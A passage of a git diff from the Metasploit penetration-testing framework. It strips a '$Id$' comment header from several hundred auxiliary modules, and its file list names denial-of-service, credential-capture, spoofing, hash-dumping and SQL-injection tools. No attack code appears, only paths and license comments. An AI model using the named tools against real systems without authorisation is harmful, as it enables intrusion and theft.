.../dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb | 4 ---- .../auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb | 4 ---- .../dos/windows/smb/ms10_006_negotiate_response_loop.rb | 4 ---- .../dos/windows/smb/ms10_054_queryfs_pool_overflow.rb | 4 ---- modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb | 4 ---- modules/auxiliary/dos/windows/smb/rras_vls_null_deref.rb | 4 ---- modules/auxiliary/dos/windows/smb/vista_negotiate_stop.rb | 4 ---- modules/auxiliary/dos/windows/smtp/ms06_019_exchange.rb | 4 ---- modules/auxiliary/dos/windows/tftp/pt360_write.rb | 4 ---- modules/auxiliary/dos/windows/tftp/solarwinds.rb | 4 ---- modules/auxiliary/dos/wireshark/chunked.rb | 4 ---- modules/auxiliary/dos/wireshark/cldap.rb | 4 ---- modules/auxiliary/dos/wireshark/ldap.rb | 4 ---- modules/auxiliary/fuzzers/ftp/client_ftp.rb | 4 ---- modules/auxiliary/fuzzers/http/http_form_field.rb | 4 ---- modules/auxiliary/fuzzers/http/http_get_uri_long.rb | 4 ---- modules/auxiliary/fuzzers/http/http_get_uri_strings.rb | 4 ---- modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb | 4 ---- modules/auxiliary/fuzzers/smb/smb_create_pipe.rb | 4 ---- modules/auxiliary/fuzzers/smb/smb_create_pipe_corrupt.rb | 4 ---- modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb | 4 ---- modules/auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt.rb | 4 ---- modules/auxiliary/fuzzers/smb/smb_tree_connect.rb | 4 ---- modules/auxiliary/fuzzers/smb/smb_tree_connect_corrupt.rb | 4 ---- modules/auxiliary/fuzzers/smtp/smtp_fuzzer.rb | 4 ---- modules/auxiliary/fuzzers/ssh/ssh_kexinit_corrupt.rb | 4 ---- modules/auxiliary/fuzzers/ssh/ssh_version_15.rb | 4 ---- modules/auxiliary/fuzzers/ssh/ssh_version_2.rb | 4 ---- modules/auxiliary/fuzzers/ssh/ssh_version_corrupt.rb | 4 ---- modules/auxiliary/fuzzers/tds/tds_login_corrupt.rb | 4 ---- modules/auxiliary/fuzzers/tds/tds_login_username.rb | 4 ---- modules/auxiliary/fuzzers/wifi/fuzz_beacon.rb | 4 ---- modules/auxiliary/fuzzers/wifi/fuzz_proberesp.rb | 4 ---- modules/auxiliary/gather/android_htmlfileprovider.rb | 4 ---- modules/auxiliary/gather/citrix_published_applications.rb | 4 ---- modules/auxiliary/gather/citrix_published_bruteforce.rb | 4 ---- modules/auxiliary/gather/search_email_collector.rb | 4 ---- modules/auxiliary/pdf/foxit/authbypass.rb | 4 ---- modules/auxiliary/scanner/backdoor/energizer_duo_detect.rb | 4 ---- modules/auxiliary/scanner/db2/db2_auth.rb | 4 ---- modules/auxiliary/scanner/db2/db2_version.rb | 4 ---- modules/auxiliary/scanner/db2/discovery.rb | 4 ---- modules/auxiliary/scanner/dcerpc/endpoint_mapper.rb | 4 ---- modules/auxiliary/scanner/dcerpc/hidden.rb | 4 ---- modules/auxiliary/scanner/dcerpc/management.rb | 4 ---- modules/auxiliary/scanner/dcerpc/tcp_dcerpc_auditor.rb | 4 ---- modules/auxiliary/scanner/dect/call_scanner.rb | 4 ---- modules/auxiliary/scanner/dect/station_scanner.rb | 4 ---- modules/auxiliary/scanner/discovery/arp_sweep.rb | 4 ---- modules/auxiliary/scanner/discovery/ipv6_neighbor.rb | 4 ---- .../scanner/discovery/ipv6_neighbor_router_advertisement.rb | 4 ---- modules/auxiliary/scanner/discovery/udp_probe.rb | 4 ---- modules/auxiliary/scanner/discovery/udp_sweep.rb | 4 ---- modules/auxiliary/scanner/emc/alphastor_devicemanager.rb | 4 ---- modules/auxiliary/scanner/emc/alphastor_librarymanager.rb | 4 ---- modules/auxiliary/scanner/finger/finger_users.rb | 4 ---- modules/auxiliary/scanner/ftp/anonymous.rb | 4 ---- modules/auxiliary/scanner/ftp/ftp_login.rb | 4 ---- modules/auxiliary/scanner/ftp/ftp_version.rb | 4 ---- modules/auxiliary/scanner/http/adobe_xml_inject.rb | 4 ---- modules/auxiliary/scanner/http/apache_userdir_enum.rb | 4 ---- modules/auxiliary/scanner/http/axis_local_file_include.rb | 4 ---- modules/auxiliary/scanner/http/axis_login.rb | 4 ---- modules/auxiliary/scanner/http/backup_file.rb | 4 ---- .../auxiliary/scanner/http/barracuda_directory_traversal.rb | 4 ---- modules/auxiliary/scanner/http/blind_sql_query.rb | 4 ---- modules/auxiliary/scanner/http/brute_dirs.rb | 4 ---- modules/auxiliary/scanner/http/cert.rb | 4 ---- modules/auxiliary/scanner/http/cisco_device_manager.rb | 4 ---- modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb | 4 ---- modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb | 4 ---- modules/auxiliary/scanner/http/cold_fusion_version.rb | 4 ---- modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb | 4 ---- modules/auxiliary/scanner/http/copy_of_file.rb | 4 ---- modules/auxiliary/scanner/http/crawler.rb | 4 ---- modules/auxiliary/scanner/http/dir_listing.rb | 4 ---- modules/auxiliary/scanner/http/dir_scanner.rb | 4 ---- modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb | 4 ---- modules/auxiliary/scanner/http/enum_wayback.rb | 4 ---- modules/auxiliary/scanner/http/error_sql_injection.rb | 4 ---- modules/auxiliary/scanner/http/file_same_name_dir.rb | 4 ---- modules/auxiliary/scanner/http/files_dir.rb | 4 ---- modules/auxiliary/scanner/http/frontpage_login.rb | 4 ---- modules/auxiliary/scanner/http/glassfish_login.rb | 4 ---- modules/auxiliary/scanner/http/http_login.rb | 4 ---- modules/auxiliary/scanner/http/http_put.rb | 4 ---- modules/auxiliary/scanner/http/http_version.rb | 4 ---- modules/auxiliary/scanner/http/httpbl_lookup.rb | 4 ---- modules/auxiliary/scanner/http/impersonate_ssl.rb | 4 ---- modules/auxiliary/scanner/http/jboss_vulnscan.rb | 4 ---- modules/auxiliary/scanner/http/litespeed_source_disclosure.rb | 4 ---- modules/auxiliary/scanner/http/lucky_punch.rb | 4 ---- .../auxiliary/scanner/http/majordomo2_directory_traversal.rb | 4 ---- modules/auxiliary/scanner/http/mod_negotiation_brute.rb | 4 ---- modules/auxiliary/scanner/http/mod_negotiation_scanner.rb | 4 ---- .../auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb | 4 ---- modules/auxiliary/scanner/http/nginx_source_disclosure.rb | 4 ---- modules/auxiliary/scanner/http/open_proxy.rb | 4 ---- modules/auxiliary/scanner/http/options.rb | 4 ---- modules/auxiliary/scanner/http/prev_dir_same_name_file.rb | 4 ---- modules/auxiliary/scanner/http/replace_ext.rb | 4 ---- modules/auxiliary/scanner/http/rewrite_proxy_bypass.rb | 4 ---- modules/auxiliary/scanner/http/robots_txt.rb | 4 ---- .../auxiliary/scanner/http/sap_businessobjects_user_brute.rb | 4 ---- .../scanner/http/sap_businessobjects_user_brute_web.rb | 4 ---- .../auxiliary/scanner/http/sap_businessobjects_user_enum.rb | 4 ---- .../scanner/http/sap_businessobjects_version_enum.rb | 4 ---- modules/auxiliary/scanner/http/scraper.rb | 4 ---- modules/auxiliary/scanner/http/soap_xml.rb | 4 ---- modules/auxiliary/scanner/http/sqlmap.rb | 4 ---- modules/auxiliary/scanner/http/squid_pivot_scanning.rb | 4 ---- modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb | 4 ---- modules/auxiliary/scanner/http/ssl.rb | 4 ---- modules/auxiliary/scanner/http/svn_scanner.rb | 4 ---- modules/auxiliary/scanner/http/tomcat_enum.rb | 4 ---- modules/auxiliary/scanner/http/tomcat_mgr_login.rb | 4 ---- modules/auxiliary/scanner/http/trace_axd.rb | 4 ---- modules/auxiliary/scanner/http/verb_auth_bypass.rb | 4 ---- modules/auxiliary/scanner/http/vhost_scanner.rb | 4 ---- modules/auxiliary/scanner/http/vmware_server_dir_trav.rb | 4 ---- modules/auxiliary/scanner/http/web_vulndb.rb | 4 ---- modules/auxiliary/scanner/http/webdav_internal_ip.rb | 4 ---- modules/auxiliary/scanner/http/webdav_scanner.rb | 4 ---- modules/auxiliary/scanner/http/webdav_website_content.rb | 4 ---- modules/auxiliary/scanner/http/xpath.rb | 4 ---- modules/auxiliary/scanner/imap/imap_version.rb | 4 ---- modules/auxiliary/scanner/ip/ipidseq.rb | 4 ---- modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb | 4 ---- modules/auxiliary/scanner/lotus/lotus_domino_login.rb | 4 ---- modules/auxiliary/scanner/lotus/lotus_domino_version.rb | 4 ---- modules/auxiliary/scanner/misc/ib_service_mgr_info.rb | 4 ---- modules/auxiliary/scanner/misc/java_rmi_server.rb | 4 ---- modules/auxiliary/scanner/misc/redis_server.rb | 4 ---- modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb | 4 ---- modules/auxiliary/scanner/misc/sunrpc_portmapper.rb | 4 ---- modules/auxiliary/scanner/motorola/timbuktu_udp.rb | 4 ---- modules/auxiliary/scanner/mssql/mssql_hashdump.rb | 4 ---- modules/auxiliary/scanner/mssql/mssql_login.rb | 4 ---- modules/auxiliary/scanner/mssql/mssql_ping.rb | 4 ---- modules/auxiliary/scanner/mssql/mssql_schemadump.rb | 4 ---- modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb | 4 ---- modules/auxiliary/scanner/mysql/mysql_hashdump.rb | 4 ---- modules/auxiliary/scanner/mysql/mysql_login.rb | 4 ---- modules/auxiliary/scanner/mysql/mysql_schemadump.rb | 4 ---- modules/auxiliary/scanner/mysql/mysql_version.rb | 4 ---- modules/auxiliary/scanner/netbios/nbname.rb | 4 ---- modules/auxiliary/scanner/netbios/nbname_probe.rb | 4 ---- modules/auxiliary/scanner/nfs/nfsmount.rb | 4 ---- modules/auxiliary/scanner/ntp/ntp_monlist.rb | 4 ---- modules/auxiliary/scanner/oracle/emc_sid.rb | 4 ---- modules/auxiliary/scanner/oracle/isqlplus_login.rb | 4 ---- modules/auxiliary/scanner/oracle/isqlplus_sidbrute.rb | 4 ---- modules/auxiliary/scanner/oracle/oracle_hashdump.rb | 4 ---- modules/auxiliary/scanner/oracle/oracle_login.rb | 4 ---- modules/auxiliary/scanner/oracle/sid_brute.rb | 4 ---- modules/auxiliary/scanner/oracle/sid_enum.rb | 4 ---- modules/auxiliary/scanner/oracle/spy_sid.rb | 4 ---- modules/auxiliary/scanner/oracle/tnslsnr_version.rb | 4 ---- modules/auxiliary/scanner/oracle/xdb_sid.rb | 4 ---- modules/auxiliary/scanner/oracle/xdb_sid_brute.rb | 4 ---- modules/auxiliary/scanner/pcanywhere/pcanywhere_login.rb | 4 ---- modules/auxiliary/scanner/pcanywhere/pcanywhere_tcp.rb | 4 ---- modules/auxiliary/scanner/pcanywhere/pcanywhere_udp.rb | 4 ---- modules/auxiliary/scanner/pop3/pop3_login.rb | 4 ---- modules/auxiliary/scanner/pop3/pop3_version.rb | 4 ---- modules/auxiliary/scanner/portscan/ack.rb | 4 ---- modules/auxiliary/scanner/portscan/ftpbounce.rb | 4 ---- modules/auxiliary/scanner/portscan/syn.rb | 4 ---- modules/auxiliary/scanner/portscan/tcp.rb | 4 ---- modules/auxiliary/scanner/portscan/xmas.rb | 4 ---- modules/auxiliary/scanner/postgres/postgres_hashdump.rb | 4 ---- modules/auxiliary/scanner/postgres/postgres_login.rb | 4 ---- modules/auxiliary/scanner/postgres/postgres_schemadump.rb | 4 ---- modules/auxiliary/scanner/postgres/postgres_version.rb | 4 ---- modules/auxiliary/scanner/rogue/rogue_recv.rb | 4 ---- modules/auxiliary/scanner/rogue/rogue_send.rb | 4 ---- modules/auxiliary/scanner/rservices/rexec_login.rb | 4 ---- modules/auxiliary/scanner/rservices/rlogin_login.rb | 4 ---- modules/auxiliary/scanner/rservices/rsh_login.rb | 4 ---- modules/auxiliary/scanner/sap/sap_icm_urlscan.rb | 4 ---- modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb | 4 ---- modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb | 4 ---- modules/auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb | 4 ---- modules/auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints.rb | 4 ---- modules/auxiliary/scanner/sap/sap_mgmt_con_getenv.rb | 4 ---- .../auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb | 4 ---- .../auxiliary/scanner/sap/sap_mgmt_con_instanceproperties.rb | 4 ---- modules/auxiliary/scanner/sap/sap_mgmt_con_listlogfiles.rb | 4 ---- modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb | 4 ---- modules/auxiliary/scanner/sap/sap_mgmt_con_version.rb | 4 ---- modules/auxiliary/scanner/scada/digi_addp_reboot.rb | 4 ---- modules/auxiliary/scanner/scada/digi_addp_version.rb | 4 ---- .../auxiliary/scanner/scada/digi_realport_serialport_scan.rb | 4 ---- modules/auxiliary/scanner/scada/digi_realport_version.rb | 4 ---- modules/auxiliary/scanner/sip/enumerator.rb | 4 ---- modules/auxiliary/scanner/sip/enumerator_tcp.rb | 4 ---- modules/auxiliary/scanner/sip/options.rb | 4 ---- modules/auxiliary/scanner/sip/options_tcp.rb | 4 ---- modules/auxiliary/scanner/sip/sipdroid_ext_enum.rb | 4 ---- modules/auxiliary/scanner/smb/pipe_auditor.rb | 4 ---- modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb | 4 ---- modules/auxiliary/scanner/smb/smb2.rb | 4 ---- modules/auxiliary/scanner/smb/smb_enumshares.rb | 4 ---- modules/auxiliary/scanner/smb/smb_enumusers.rb | 4 ---- modules/auxiliary/scanner/smb/smb_enumusers_domain.rb | 4 ---- modules/auxiliary/scanner/smb/smb_lookupsid.rb | 4 ---- modules/auxiliary/scanner/smb/smb_version.rb | 4 ---- modules/auxiliary/scanner/smtp/smtp_enum.rb | 4 ---- modules/auxiliary/scanner/smtp/smtp_version.rb | 4 ---- modules/auxiliary/scanner/snmp/aix_version.rb | 4 ---- modules/auxiliary/scanner/snmp/cisco_config_tftp.rb | 4 ---- modules/auxiliary/scanner/snmp/cisco_upload_file.rb | 4 ---- modules/auxiliary/scanner/snmp/snmp_enum.rb | 4 ---- modules/auxiliary/scanner/snmp/snmp_enumshares.rb | 4 ---- modules/auxiliary/scanner/snmp/snmp_enumusers.rb | 4 ---- modules/auxiliary/scanner/snmp/snmp_login.rb | 4 ---- modules/auxiliary/scanner/snmp/snmp_set.rb | 4 ---- modules/auxiliary/scanner/snmp/xerox_workcentre_enumusers.rb | 4 ---- modules/auxiliary/scanner/ssh/ssh_login.rb | 4 ---- modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb | 4 ---- modules/auxiliary/scanner/ssh/ssh_version.rb | 4 ---- modules/auxiliary/scanner/telephony/wardial.rb | 4 ---- modules/auxiliary/scanner/telnet/lantronix_telnet_version.rb | 4 ---- modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb | 4 ---- modules/auxiliary/scanner/telnet/telnet_login.rb | 4 ---- modules/auxiliary/scanner/telnet/telnet_version.rb | 4 ---- modules/auxiliary/scanner/tftp/tftpbrute.rb | 4 ---- modules/auxiliary/scanner/upnp/ssdp_msearch.rb | 4 ---- modules/auxiliary/scanner/vmware/esx_fingerprint.rb | 4 ---- modules/auxiliary/scanner/vmware/vmauthd_login.rb | 4 ---- modules/auxiliary/scanner/vmware/vmauthd_version.rb | 4 ---- modules/auxiliary/scanner/vmware/vmware_enum_permissions.rb | 4 ---- modules/auxiliary/scanner/vmware/vmware_enum_sessions.rb | 4 ---- modules/auxiliary/scanner/vmware/vmware_enum_users.rb | 4 ---- modules/auxiliary/scanner/vmware/vmware_enum_vms.rb | 4 ---- modules/auxiliary/scanner/vmware/vmware_host_details.rb | 4 ---- modules/auxiliary/scanner/vmware/vmware_http_login.rb | 4 ---- modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb | 4 ---- modules/auxiliary/scanner/vnc/vnc_login.rb | 4 ---- modules/auxiliary/scanner/vnc/vnc_none_auth.rb | 4 ---- modules/auxiliary/scanner/voice/recorder.rb | 4 ---- modules/auxiliary/scanner/vxworks/wdbrpc_bootline.rb | 4 ---- modules/auxiliary/scanner/vxworks/wdbrpc_version.rb | 4 ---- modules/auxiliary/scanner/winrm/winrm_auth_methods.rb | 4 ---- modules/auxiliary/scanner/winrm/winrm_cmd.rb | 4 ---- modules/auxiliary/scanner/winrm/winrm_login.rb | 4 ---- modules/auxiliary/scanner/winrm/winrm_wql.rb | 4 ---- modules/auxiliary/scanner/x11/open_x11.rb | 4 ---- modules/auxiliary/server/browser_autopwn.rb | 4 ---- modules/auxiliary/server/capture/ftp.rb | 4 ---- modules/auxiliary/server/capture/http.rb | 4 ---- modules/auxiliary/server/capture/http_ntlm.rb | 4 ---- modules/auxiliary/server/capture/imap.rb | 4 ---- modules/auxiliary/server/capture/pop3.rb | 4 ---- modules/auxiliary/server/capture/sip.rb | 4 ---- modules/auxiliary/server/capture/smb.rb | 4 ---- modules/auxiliary/server/capture/smtp.rb | 4 ---- modules/auxiliary/server/capture/telnet.rb | 4 ---- modules/auxiliary/server/dhcp.rb | 4 ---- modules/auxiliary/server/dns/spoofhelper.rb | 4 ---- modules/auxiliary/server/fakedns.rb | 4 ---- modules/auxiliary/server/ftp.rb | 4 ---- modules/auxiliary/server/pxexploit.rb | 4 ---- modules/auxiliary/server/socks4a.rb | 4 ---- modules/auxiliary/server/socks_unc.rb | 4 ---- modules/auxiliary/server/tftp.rb | 4 ---- modules/auxiliary/server/webkit_xslt_dropper.rb | 4 ---- modules/auxiliary/sniffer/psnuffle.rb | 4 ---- modules/auxiliary/spoof/arp/arp_poisoning.rb | 4 ---- modules/auxiliary/spoof/cisco/dtp.rb | 4 ---- modules/auxiliary/spoof/dns/bailiwicked_domain.rb | 4 ---- modules/auxiliary/spoof/dns/bailiwicked_host.rb | 4 ---- modules/auxiliary/spoof/dns/compare_results.rb | 4 ---- modules/auxiliary/spoof/nbns/nbns_response.rb | 4 ---- modules/auxiliary/spoof/replay/pcap_replay.rb | 4 ---- modules/auxiliary/spoof/wifi/airpwn.rb | 4 ---- modules/auxiliary/spoof/wifi/dnspwn.rb | 4 ---- modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb | 4 ---- modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb | 4 ---- modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb | 4 ---- modules/auxiliary/sqli/oracle/dbms_cdc_publish3.rb | 4 ---- modules/auxiliary/sqli/oracle/dbms_export_extension.rb | 4 ---- .../auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb | 4 ---- modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb | 4 ---- modules/auxiliary/sqli/oracle/dbms_metadata_open.rb | 4 ---- modules/auxiliary/sqli/oracle/droptable_trigger.rb | 4 ---- modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb | 4 ---- modules/auxiliary/sqli/oracle/jvm_os_code_11g.rb | 4 ---- modules/auxiliary/sqli/oracle/lt_compressworkspace.rb | 4 ---- modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb | 4 ---- modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb | 4 ---- modules/auxiliary/sqli/oracle/lt_removeworkspace.rb | 4 ---- modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb | 4 ---- modules/auxiliary/vsploit/malware/dns/dns_mariposa.rb | 4 ---- modules/auxiliary/vsploit/malware/dns/dns_query.rb | 4 ---- modules/auxiliary/vsploit/malware/dns/dns_zeus.rb | 4 ---- modules/auxiliary/vsploit/pii/email_pii.rb | 4 ---- modules/auxiliary/vsploit/pii/web_pii.rb | 4 ---- 425 files changed, 1700 deletions(-) diff --git a/modules/auxiliary/admin/2wire/xslt_password_reset.rb b/modules/auxiliary/admin/2wire/xslt_password_reset.rb index 19c42c0bd9..e10d8c59b5 100644 --- a/modules/auxiliary/admin/2wire/xslt_password_reset.rb +++ b/modules/auxiliary/admin/2wire/xslt_password_reset.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/admin/backupexec/dump.rb b/modules/auxiliary/admin/backupexec/dump.rb index 2f7f2d7873..263f4ca58b 100644 --- a/modules/auxiliary/admin/backupexec/dump.rb +++ b/modules/auxiliary/admin/backupexec/dump.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/admin/backupexec/registry.rb b/modules/auxiliary/admin/backupexec/registry.rb index 349a804311..cdcaa258c0 100644 --- a/modules/auxiliary/admin/backupexec/registry.rb +++ b/modules/auxiliary/admin/backupexec/registry.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb b/modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb index 82786e097c..95e1613665 100644 --- a/modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb +++ b/modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb b/modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb index 5992230732..ea4322fa33 100644 --- a/modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb +++ b/modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/admin/db2/db2rcmd.rb b/modules/auxiliary/admin/db2/db2rcmd.rb index 889389947a..609cf21d23 100644 --- a/modules/auxiliary/admin/db2/db2rcmd.rb +++ b/modules/auxiliary/admin/db2/db2rcmd.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/admin/edirectory/edirectory_dhost_cookie.rb b/modules/auxiliary/admin/edirectory/edirectory_dhost_cookie.rb index 6c3dae81c3..6e9cfc753f 100644 --- a/modules/auxiliary/admin/edirectory/edirectory_dhost_cookie.rb +++ b/modules/auxiliary/admin/edirectory/edirectory_dhost_cookie.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/admin/emc/alphastor_devicemanager_exec.rb b/modules/auxiliary/admin/emc/alphastor_devicemanager_exec.rb index 895db730f3..fdca984d35 100644 --- a/modules/auxiliary/admin/emc/alphastor_devicemanager_exec.rb +++ b/modules/auxiliary/admin/emc/alphastor_devicemanager_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb b/modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb index 24f240795a..81baa368a1 100644 --- a/modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb +++ b/modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/admin/ftp/titanftp_xcrc_traversal.rb b/modules/auxiliary/admin/ftp/titanftp_xcrc_traversal.rb index e25693f213..54346a1ca7 100644 --- a/modules/auxiliary/admin/ftp/titanftp_xcrc_traversal.rb +++ b/modules/auxiliary/admin/ftp/titanftp_xcrc_traversal.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb b/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb index 7331ec37d6..2d91ae1abd 100644 --- a/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb +++ b/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb b/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb index c3588f89b9..8e65ba21b2 100644 --- a/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb +++ b/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb b/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb index f779477cf0..f7e17f2145 100644 --- a/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb +++ b/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/admin/http/tomcat_administration.rb b/modules/auxiliary/admin/http/tomcat_administration.rb index 587196a6f9..ec1fa3fcad 100644 --- a/modules/auxiliary/admin/http/tomcat_administration.rb +++ b/modules/auxiliary/admin/http/tomcat_administration.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb b/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb index 65f36f19fb..1ddf6fc5ef 100644 --- a/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb +++ b/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb b/modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb index f74a15c939..144d02fd86 100644 --- a/modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb +++ b/modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/admin/http/typo3_sa_2009_001.rb b/modules/auxiliary/admin/http/typo3_sa_2009_001.rb index 312158392f..3a80950663 100644 --- a/modules/auxiliary/admin/http/typo3_sa_2009_001.rb +++ b/modules/auxiliary/admin/http/typo3_sa_2009_001.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/admin/http/typo3_sa_2009_002.rb b/modules/auxiliary/admin/http/typo3_sa_2009_002.rb index 81e1112400..0535c9b7dd 100644 --- a/modules/auxiliary/admin/http/typo3_sa_2009_002.rb +++ b/modules/auxiliary/admin/http/typo3_sa_2009_002.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/admin/http/typo3_sa_2010_020.rb b/modules/auxiliary/admin/http/typo3_sa_2010_020.rb index 5a9c9b7390..f8f587bf70 100644 --- a/modules/auxiliary/admin/http/typo3_sa_2010_020.rb +++ b/modules/auxiliary/admin/http/typo3_sa_2010_020.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/admin/http/typo3_winstaller_default_enc_keys.rb b/modules/auxiliary/admin/http/typo3_winstaller_default_enc_keys.rb index 7fef9a1edf..68f30cdb1c 100644 --- a/modules/auxiliary/admin/http/typo3_winstaller_default_enc_keys.rb +++ b/modules/auxiliary/admin/http/typo3_winstaller_default_enc_keys.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb b/modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb index 4a504fd646..198f8b2150 100644 --- a/modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb +++ b/modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/admin/motorola/wr850g_cred.rb b/modules/auxiliary/admin/motorola/wr850g_cred.rb index 1da7df6574..f9de596ebc 100644 --- a/modules/auxiliary/admin/motorola/wr850g_cred.rb +++ b/modules/auxiliary/admin/motorola/wr850g_cred.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and 